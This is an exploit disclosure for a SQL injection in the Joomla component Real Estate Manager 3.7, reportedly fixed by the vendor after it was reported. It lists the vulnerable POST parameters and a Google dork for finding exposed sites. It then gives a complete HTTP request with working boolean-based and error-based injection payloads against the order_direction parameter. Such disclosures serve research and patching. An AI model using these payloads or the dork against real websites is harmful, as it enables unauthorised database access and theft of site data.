This vulnerability is found in Joomla CMS component Real Estate Manager, version 3.7. Type of the vulnerability is SQLi (SQL injection). I found it on October 10th, 2015. I have submitted the find to the vendors of the component, they have fixed it in next version.
Exploit module for Metasploit can be found here: https://www.rapid7.com/db/modules/auxiliary/gather/joomla_com_realestatemanager_sqli
REMARK: This vulnerability is found and tested on loacalhost.
#Component description on vendor page:
Real Estate Manager is handy joomla rental component and powerful solution for build real estate website creation and property management. It will fit perfectly for independent estate realtor, property rental companies and agencies, motel booking, hotel room booking, property rental, real estate selling and realty management.
#Dodatni podaci o komponenti:
# Title of the
vulnerability/exploit: [Joomla component com_realestatemanager - SQL injection]
# Google Dork: [inurl:option=com_realestatemanager]
# Date: [2015-10-10]
# Author of the
vulnerability/exploit: [Omer Ramić]
# Vendor website: [http://ordasoft.com/]
# Link to software: [http://ordasoft.com/Real-Estate-Manager-Software-Joomla.html]
# Version: [3.7] & probably all the older versions
# Platform it was tested on: Linux/Windows/PHP 5.5.28/Apache 2.4.16
Parameter_1: order_direction (POST)
Parameter_2: order_field (POST)
POST
/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132
HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://
[HOST]/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132
Cookie: security_level=0;
9d929655f6556b9fb49bf0e118bafb11=tp72u418eemk6jdvvnctoamna0; countrytabs=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
order_direction=asc&order_field=price
order_direction=asc,(SELECT (CASE WHEN (7918=7918) THEN 1 ELSE 7918*(SELECT 7918 FROM INFORMATION_SCHEMA.CHARACTER_SETS)END))&order_field=price
order_direction=asc,(SELECT 1841 FROM(SELECTCOUNT(*),CONCAT(0x716b787671,(SELECT(ELT(1841=1841,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_field=price